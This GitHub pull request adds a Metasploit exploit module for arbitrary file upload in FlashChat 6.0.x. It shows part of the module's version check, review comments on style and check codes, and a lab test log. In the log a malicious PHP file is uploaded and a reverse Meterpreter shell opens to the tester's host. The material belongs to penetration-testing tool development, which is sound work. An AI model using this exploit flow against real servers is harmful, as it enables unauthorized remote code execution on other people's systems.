Add FlashChat Arbitrary File Upload exploit module #2469

Merged
merged 1 commit into from Oct 5, 2013


@bcoles
Contributor
bcoles commented Oct 5, 2013

Add FlashChat Arbitrary File Upload exploit module.

Add FlashChat Arbitrary File Upload

@jvazquez-r7 jvazquez-r7 commented on the diff Oct 5, 2013
modules/exploits/unix/webapp/flashchat_upload_exec.rb
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to FlashChat', '/chat/'])
+ ], self.class)
+ end
+
+ #
+ # Checks if target is running FlashChat versions 6.0.2, 6.0.4 to 6.0.8
+ #
+ def check
+ uri = normalize_uri(target_uri.path, '')
+ res = send_request_raw({'uri' => uri})
+
+ if not res
+ print_error("#{peer} - Connection timed out")
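Review bot: in `check`, the `if not res` branch should end by returning an explicit check code (for example `Exploit::CheckCode::Unknown`) after the `print_error`, since callers expect a check code from this method. The lines that follow are not shown here, so confirm it is not a bare `return`. `unless res` is also the more idiomatic Ruby spelling of `if not res`. Separately, the empty-string second argument in `normalize_uri(target_uri.path, '')` is not self-explanatory; a short comment on why it is passed, or dropping it if it is not needed, would help the next reader.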
@jvazquez-r7
jvazquez-r7 Oct 5, 2013 Contributor

Please use fail_with instead of print_error / return

@jvazquez-r7
jvazquez-r7 Oct 5, 2013 Contributor

Forget the comment above, it is check :)

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request Oct 5, 2013
jvazquez-r7 Land #2469, @bcoles exploit for FlashChat 875e086
@jvazquez-r7 jvazquez-r7 merged commit 08243b2 into rapid7:master Oct 5, 2013

1 check passed

default The Travis CI build passed
@jvazquez-r7
Contributor

Landed after minor cleanup available here: 24efb55

Test (exploit and check) (after cleanup):

msf exploit(flashchat_upload_exec) > set rhost 192.168.172.133
rhost => 192.168.172.133
msf exploit(flashchat_upload_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.133:80 - Uploading malicious file...
[*] 192.168.172.133:80 - Executing C9IzBWHgLOBd.php...
[*] Sending stage (39195 bytes) to 192.168.172.133
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.133:48602) at 2013-10-05 14:50:20 -0500
[+] Deleted C9IzBWHgLOBd.php

^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.133 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(flashchat_upload_exec) > check

[*] 192.168.172.133:80 - Version found: 6.0.8
[+] The target is vulnerable.
